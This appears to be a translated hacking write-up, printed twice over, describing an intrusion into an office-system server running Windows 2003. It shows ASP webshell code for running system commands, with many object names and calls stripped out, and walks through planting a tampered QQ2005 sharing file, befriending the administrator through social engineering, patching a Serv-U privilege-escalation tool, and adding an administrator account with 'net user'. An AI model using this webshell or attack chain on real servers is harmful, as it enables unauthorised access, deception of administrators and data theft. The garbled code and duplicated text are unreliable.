Third-party software running on servers has always been seen by attackers as shortcuts to invade target systems. Now, the famous Tencent QQ has been included in these shortcut lists again. Fortunately, QQ is not one of the necessary software for the server, so I believe it will not cause a large-scale crisis. Although there are not many special circumstances in the article, everyone should still make corresponding defenses in accordance with the principle of "when possible, you should be prevented".
1. The webshell obtained in Windows 2003
The goal of this penetration is an OA office system server. Its operating system has been recently upgraded to Windows 2003, but OA still has an asp file upload vulnerability, so there is no suspense about the acquisition of webshell.
Obstacles are encountered when permissions are increased---
After logging in to the webshell, I found that I could only view the server's D drive and could not access any of the C drives. The prompt from the webshell is "No permissions". This was expected, because wenshell only has the guest group permissions, and win2003 prohibits access to "Everyone" anonymous users and "Guest" group permission users by default, which also causes it to be unable to run through webshell.
The only thing that is fortunate is that using Webshell, you can read and write various subdirectories of D drive (storing web virtual directories). In addition to the web virtual directory, there are also some data backup files and a Tencent QQ installation directory Tencent.
2. Cracking the ultimate defense of Serv-u
The various default security configurations of Windows 2003 show its powerful side. It seems unlikely to increase existing permissions in the near future. It was not until I tried to issue an FTP link request to this server from the system and saw the Serv-u banner.
As mentioned earlier, due to the permission restrictions on Windows 2003, it cannot run through webshell. This statement was also mentioned in the article "Building Windows 2003 Fortress Host" in the 6th issue of Defense in 2004. However, practice shows that this is not correct. Uploading unrestricted files in local non-2003 systems through webshell to the executable directory, and then through wscript components, you can also obtain corresponding permissions under Windows 2003 through webshell. Combined, you can even get a shell under the command line with guest group permissions.
To do this, I have made some improvements to Veteran's Webmaster Assistant 6.0 and added the following code to enable it to use the components to run local uploads.
Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = ""
if Request("wscript")="yes" then
checked=" checked"
else
checked=""
end if
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method=post><input name=cmdStyle=width:92% class=cmd value="&DefCmd&"><input type=submit value=run>"
SI=SI&"<textarea Style=width:100%;height:500; class=cmd>"
If ("cmd")<>"" Then
if ("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=(ShellPath&" /c "&DefCmd)
aaa=
SI=SI&aaa
else%>
<object runat=server id=ws scope=page class></object>
<object runat=server id=ws scope=page class></object>
<object runat=server id=fso scope=page class></object>
<%szTempFile = ("")
Call (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("")
Set oFilelcx = (szTempFile, 1, False, 0)
aaa=()
Call (szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea>"
SI=SI&"SHELL path: <input name=SPvalue="&ShellPath&" Style=width:70%> "
SI=SI&"<input type=checkbox name=wscript value=yes"&checked&"></form>"
SI
End Function
When using it, you only need to specify the uploaded path in the shell path and select the option Wscript to run some system commands with lower permissions, such as "net start" or "netstat -an". After running these two commands in turn, Webshell echoes many services, including Serv-U FTP Server. Port 43958 appears in the active port list, so I naturally thought of the powerful Serv-u ftp Server local permission enhancement vulnerability. However, when executing system commands, the 530 error message appears (as shown in Figure 1). It seems that the administrator or others have pudded Serv-u or made some security configurations. In order to know what kind of security configuration is, I checked the relevant articles online. One of them is "Serv-u ftp Server The Ultimate Prevention of Local Permission Improvement Vulnerability" which is very popular and has been reproduced by many parties. The author is a paradise Xiaolu. Judging from the error prompt, it is very likely that the so-called ultimate defense in this article was made, that is, the default administrator or password was modified. Of course, this is just a hypothesis. You can only determine it by downloading the target server and looking at the specific configuration. However, C drives installed with Serv-u are prohibited from accessing, including the Program files directory, and the permission escalation is blocked again.
3. Use QQ2005 shared file vulnerability to increase permissions to the end
After flipping through the D drive again, I saw the Tencent folder that I rarely see on the server. Check.
I learned that the version of QQ is QQ2005 Beta1, and the creation time of several related files also indicates that the network administrator has logged into QQ on the server recently. Can you only use QQ? After some thought, I finally thought of a vulnerability in the file sharing function of QQ2005 that can be exploited.
This vulnerability appears with the new features added to QQ2005 New Year Edition. The harm can be described as: using this vulnerability, an attacker can browse and read any file in the user's system (such as sam files, data backup files, and sensitive information files). Affecting the system: All Windows series operating systems with QQ2005 New Year Edition or above are installed.
The specific method of utilization is: first log in to your QQ on the machine, call up the "QQ menu", select Tools -> Set Sharing, specify C:\ or any other valuable partition as a shared file, close QQ after completion, and find the "" file in the folder named after the QQ account in the installation directory. As shown in Figure 3. , upload the same file on the target server (such as: D:\Tencent\QQ\654321\). In this way, when the network administrator logs in to QQ on the server, it will open the C drive to friends as a shared directory. .
Because strangers cannot share the other party’s documents, they also need to apply for social engineering to add the administrator as a friend (of course the more trustworthy the reason, the better). If the administrator requests, the server's C drive will be shared in the name of the QQ shared file directory. Files that could not be accessed through WEBSHELL can be downloaded. The road to escalation of permissions that are blocked can continue.
The administrator approved the application that night and added me as a friend. The IP displayed on the polyps QQ is exactly the IP of the target server, so I downloaded the file, opened it with UE and looked for 127.0.0.1, and found that the built-in account "LocalAdministrator" under the default configuration was indeed changed to "LocalAdministruser". This seems to be a very "ultimate" defense, but Xiaolu, who proposed this method, seems to have published it without the need for offense and defense. You must know that the attacker only needs to know the modified configuration and make corresponding modifications to the local permission enhancement utilization tool, and the so-called ultimate defense will be broken. The method is to use the UE to open the shelled serv-u local permission enhancement tool, and change LocalAdministrator to LocalAdministruser.
Then upload the modified one, execute D:\web\ "net user user password /add" in it and look at the results. A user has been successfully added. Then add the user to the administrators group and the "Remote desktop users" group and log in to the remote desktop of the target server.
――After many obstacles, we finally completely conquered this solid Windows 2003 fortress.
4. Simple revelation
It can be seen that, like "the fewer services are, the safer", the fewer "third parties" running on the server, the safer, the more secure it is. The popular PcAnywhere, VNC, Serv-U permission enhancement and the proposed leverage of QQ2005 can all be avoided in this way.
1. The webshell obtained in Windows 2003
The goal of this penetration is an OA office system server. Its operating system has been recently upgraded to Windows 2003, but OA still has an asp file upload vulnerability, so there is no suspense about the acquisition of webshell.
Obstacles are encountered when permissions are increased---
After logging in to the webshell, I found that I could only view the server's D drive and could not access any of the C drives. The prompt from the webshell is "No permissions". This was expected, because wenshell only has the guest group permissions, and win2003 prohibits access to "Everyone" anonymous users and "Guest" group permission users by default, which also causes it to be unable to run through webshell.
The only thing that is fortunate is that using Webshell, you can read and write various subdirectories of D drive (storing web virtual directories). In addition to the web virtual directory, there are also some data backup files and a Tencent QQ installation directory Tencent.
2. Cracking the ultimate defense of Serv-u
The various default security configurations of Windows 2003 show its powerful side. It seems unlikely to increase existing permissions in the near future. It was not until I tried to issue an FTP link request to this server from the system and saw the Serv-u banner.
As mentioned earlier, due to the permission restrictions on Windows 2003, it cannot run through webshell. This statement was also mentioned in the article "Building Windows 2003 Fortress Host" in the 6th issue of Defense in 2004. However, practice shows that this is not correct. Uploading unrestricted files in local non-2003 systems through webshell to the executable directory, and then through wscript components, you can also obtain corresponding permissions under Windows 2003 through webshell. Combined, you can even get a shell under the command line with guest group permissions.
To do this, I have made some improvements to Veteran's Webmaster Assistant 6.0 and added the following code to enable it to use the components to run local uploads.
Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = ""
if Request("wscript")="yes" then
checked=" checked"
else
checked=""
end if
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method=post><input name=cmdStyle=width:92% class=cmd value="&DefCmd&"><input type=submit value=run>"
SI=SI&"<textarea Style=width:100%;height:500; class=cmd>"
If ("cmd")<>"" Then
if ("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=(ShellPath&" /c "&DefCmd)
aaa=
SI=SI&aaa
else%>
<object runat=server id=ws scope=page class></object>
<object runat=server id=ws scope=page class></object>
<object runat=server id=fso scope=page class></object>
<%szTempFile = ("")
Call (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("")
Set oFilelcx = (szTempFile, 1, False, 0)
aaa=()
Call (szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea>"
SI=SI&"SHELL path: <input name=SPvalue="&ShellPath&" Style=width:70%> "
SI=SI&"<input type=checkbox name=wscript value=yes"&checked&"></form>"
SI
End Function
When using it, you only need to specify the uploaded path in the shell path and select the option Wscript to run some system commands with lower permissions, such as "net start" or "netstat -an". After running these two commands in turn, Webshell echoes many services, including Serv-U FTP Server. Port 43958 appears in the active port list, so I naturally thought of the powerful Serv-u ftp Server local permission enhancement vulnerability. However, when executing system commands, the 530 error message appears (as shown in Figure 1). It seems that the administrator or others have pudded Serv-u or made some security configurations. In order to know what kind of security configuration is, I checked the relevant articles online. One of them is "Serv-u ftp Server The Ultimate Prevention of Local Permission Improvement Vulnerability" which is very popular and has been reproduced by many parties. The author is a paradise Xiaolu. Judging from the error prompt, it is very likely that the so-called ultimate defense in this article was made, that is, the default administrator or password was modified. Of course, this is just a hypothesis. You can only determine it by downloading the target server and looking at the specific configuration. However, C drives installed with Serv-u are prohibited from accessing, including the Program files directory, and the permission escalation is blocked again.
3. Use QQ2005 shared file vulnerability to increase permissions to the end
After flipping through the D drive again, I saw the Tencent folder that I rarely see on the server. Check.
I learned that the version of QQ is QQ2005 Beta1, and the creation time of several related files also indicates that the network administrator has logged into QQ on the server recently. Can you only use QQ? After some thought, I finally thought of a vulnerability in the file sharing function of QQ2005 that can be exploited.
This vulnerability appears with the new features added to QQ2005 New Year Edition. The harm can be described as: using this vulnerability, an attacker can browse and read any file in the user's system (such as sam files, data backup files, and sensitive information files). Affecting the system: All Windows series operating systems with QQ2005 New Year Edition or above are installed.
The specific method of utilization is: first log in to your QQ on the machine, call up the "QQ menu", select Tools -> Set Sharing, specify C:\ or any other valuable partition as a shared file, close QQ after completion, and find the "" file in the folder named after the QQ account in the installation directory. As shown in Figure 3. , upload the same file on the target server (such as: D:\Tencent\QQ\654321\). In this way, when the network administrator logs in to QQ on the server, it will open the C drive to friends as a shared directory. .
Because strangers cannot share the other party’s documents, they also need to apply for social engineering to add the administrator as a friend (of course the more trustworthy the reason, the better). If the administrator requests, the server's C drive will be shared in the name of the QQ shared file directory. Files that could not be accessed through WEBSHELL can be downloaded. The road to escalation of permissions that are blocked can continue.
The administrator approved the application that night and added me as a friend. The IP displayed on the polyps QQ is exactly the IP of the target server, so I downloaded the file, opened it with UE and looked for 127.0.0.1, and found that the built-in account "LocalAdministrator" under the default configuration was indeed changed to "LocalAdministruser". This seems to be a very "ultimate" defense, but Xiaolu, who proposed this method, seems to have published it without the need for offense and defense. You must know that the attacker only needs to know the modified configuration and make corresponding modifications to the local permission enhancement utilization tool, and the so-called ultimate defense will be broken. The method is to use the UE to open the shelled serv-u local permission enhancement tool, and change LocalAdministrator to LocalAdministruser.
Then upload the modified one, execute D:\web\ "net user user password /add" in it and look at the results. A user has been successfully added. Then add the user to the administrators group and the "Remote desktop users" group and log in to the remote desktop of the target server.
――After many obstacles, we finally completely conquered this solid Windows 2003 fortress.
4. Simple revelation
It can be seen that, like "the fewer services are, the safer", the fewer "third parties" running on the server, the safer, the more secure it is. The popular PcAnywhere, VNC, Serv-U permission enhancement and the proposed leverage of QQ2005 can all be avoided in this way.